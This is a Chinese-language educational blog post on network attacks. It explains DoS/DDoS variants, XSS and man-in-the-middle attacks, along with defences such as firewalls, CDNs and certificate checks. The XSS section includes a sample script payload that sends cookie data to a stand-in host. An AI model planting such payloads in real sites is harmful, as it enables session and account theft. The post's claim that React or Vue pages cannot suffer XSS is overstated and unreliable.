计算机网络系列（六）详解各种网络攻击

拒绝服务攻击（DoS)

拒绝服务攻击（Denial-of-Service Attack，DoS） 是一种常见的攻击手段。虽然目前互联网越来越趋向于正规化，但是对于黑产还有利用 DoS 攻击黑吃黑的现象。比较常见的就是热血传奇这款游戏的私服，搭建一个私服可以获得大额非法收入，但是因为是黑产也会经常受到黑客的攻击。黑客攻击后，再发邮件到管理员邮箱索取金钱，威胁用户不尽快打款就会一直攻击。

在过去，黑产间的攻阀，DoS 就可以作为一种常见武器。DoS 的原理就是利用大量的流量迅速向一个网站发送出去。这种流量可能是应用层的，比如大量 HTTP 请求；也可以是传输层，比如大量的 TCP 请求。比如 2018 年 2 月 18 日，Github 就遭受了一场超大规模的 DoS 攻击，瞬间流量峰值达到了 1.35Tbps。之后，黑客还对 Google、亚马逊等网站也进行了攻击。

为了形成足够强大的流量，攻击者往往没有足够的经济实力购买机器，而是利用中病毒、木马的机器组织流量攻击。这些中病毒的机器，我们俗称“肉鸡”。顶级的黑客往往控制着大量的肉鸡，一声令下，肉鸡就开始疯狂向目标发送网络封包，直到打垮目标。因为肉鸡是分散在世界各地的，因此这种攻击我们也称为分布式拒绝服务攻击（Distributed Denial-of-Service Attack， DDoS）。

DDoS 的种类

DDoS 的种类有很多，手段也很复杂。

• 直接不停发送 Ping 消息的，利用底层的 ICMP 协议，称为ICMP 攻击；

• 走 UPD 协议的，称为UDP 洪水（UDP Flood）；

• 不停利用 TCP 协议发送 SYN 消息的，也叫SYN 攻击；

• 模拟用户行为，不停发帖、浏览帖子、浏览网页、加购物车等，称为挑战黑洞攻击（Challenge Collapsar）。

防范措施

当遇到 DDoS 攻击的时候，如果有所准备，就可以做到有备无患。比如说购买了防火墙，防火墙会根据特征识别出攻击行为，通过这样的方式将攻击行为过滤掉，让系统不会因为 DDoS 而过载造成崩溃。

当然如果是纯粹的流量攻击，仅仅靠防火墙是不够的。通常一些大型互联网公司会进行多活建设。一般是两地三机房，分别是日常生产环境、同城灾备环境和异地灾备环境，遇到 DDoS 可以考虑切换流量，也能起到一定作用。

另外 CDN 在解决 DDoS 时往往也有很好的效果，毕竟 CDN 是大量缓存节点，DDoS 攻击 CDN 的时候用不上力。当然，如果资金不足以购买服务器的小团队，可以自己实现软件防火墙。其实就是设计一台吞吐量极高的代理服务器，作为反向代理挡在所有服务前面，如果遇到 DDoS，代理服务器可以识别出一些特征并丢弃一些流量。

在遇到攻击的时候，对服务适当降级也是有必要的，甚至可以牺牲一部分用户保全另一部分用户的正常使用。防火墙是基于特征识别，本身也会有一定的误杀现象，在被攻击的时候，可以人为降低判定攻击行为的门槛。通过允许防火墙造成一部分的误伤来识别出更多的攻击流量。

跨站脚本攻击（XSS）

2021 年 2 月印度的一名测试工程师在苹果 iCloud 官网中发现了一个跨站脚本攻击漏洞，并向苹果公司提交了具体的漏洞说明和触发的操作步骤。事后，苹果公司给这名印度人发放了 5000 美金的奖金。

跨站脚本（Cross Site Scripting），顾名思义，就是利用漏洞将脚本注入网页中。比如提交个人信息的输入框，如果在服务端没有处理好就有可能触发跨站脚本。

假设有一个输入个人签名的多行文本输入框，正常用户会输入几句有趣的话，但是黑客可能会尝试输入：

<script>document.createElement('img').src="https://some.site.com?cookie=document.cookie"</script>

如果这段话被显示到用户的个人主页，那么访问这个用户空间的其他用户就会被攻击，进而被黑客拿走 Cookie 中的关键信息。

XSS 攻击模式很简单，就是想办法向网站的页面上注入脚本。总的来说，输入框是一个重灾区。目前随着前端技术的发展，使用前端框架，比如 React 或 Vue 开发的页面已经杜绝了被 XSS 的可能。但是有时候如果工作出现某些疏漏，还是会导致 XSS 的发生。所以正确的做法是上线前拜托安全部门的同学协助进行一些针对 XSS 漏洞的扫描。

中间人攻击

我们国家目前在打击网络电信诈骗案中，就有这样一种形式。一些不法分子利用伪基站，比如找一个人多的地方，用自己的伪基站设备伪装成基站，向用户提供网络。一些离不法分子较近的人，手机可能会连接上伪基站。连接上后，不法分子的伪基站就成了你上网的代理，可以进行很多非法操作。因此，从这个角度看，中间人黑进你附近的网络，成为你上网的“代理”，并不是非常难的一件事情。不懂技术的犯罪分子，通过购买伪基站设备，就可以充当中间人。

在遇到中间人攻击时，互联网的信用体系、操作系统、浏览器等就会帮你把好最后一关。比如你访问淘宝购物，中间人向你投放假网页。浏览器就会去验证这个假网页的证书，是不是淘宝的证书。去年 Github 在国内疑似被中间人攻击的案例中，国内很多用户看到的现象是浏览器提示用户浏览的网站不安全。这种情况就是浏览器在校对证书的时候发现了疑点。如果你上网遇到这种情况应该选择立即关闭这个网页，不进行后续的操作，防止被骗。

总结

生活在当今时代，作为个人，网络安全是一件大事。你的购票信息、出行记录、账号密码、位置信息等，都需要你有防范意识，防止被不法分子拿走。在为公司工作的时候，要保管好自己的账号。特别是你工作用的计算机，要远离非正规渠道获得的软件。你的工作计算机一旦中了木马，成了肉鸡，那不法分子完全可以用你的工作计算机作为跳板，登录公司服务器。

另一方面，作为公司和团队，也要有较强的安全意识。当然，安全领域有自己的专业知识和人才。在互联网产品初期，往往承担不起昂贵的防火墙和雇佣安全专家的费用，这个时候需要开发者主动去学习安全知识，尽可能提升被攻破的成本。当业务发展到一定程度后，就需要马上雇佣安全专家，以及购买包括防火墙在内的网络安全设备。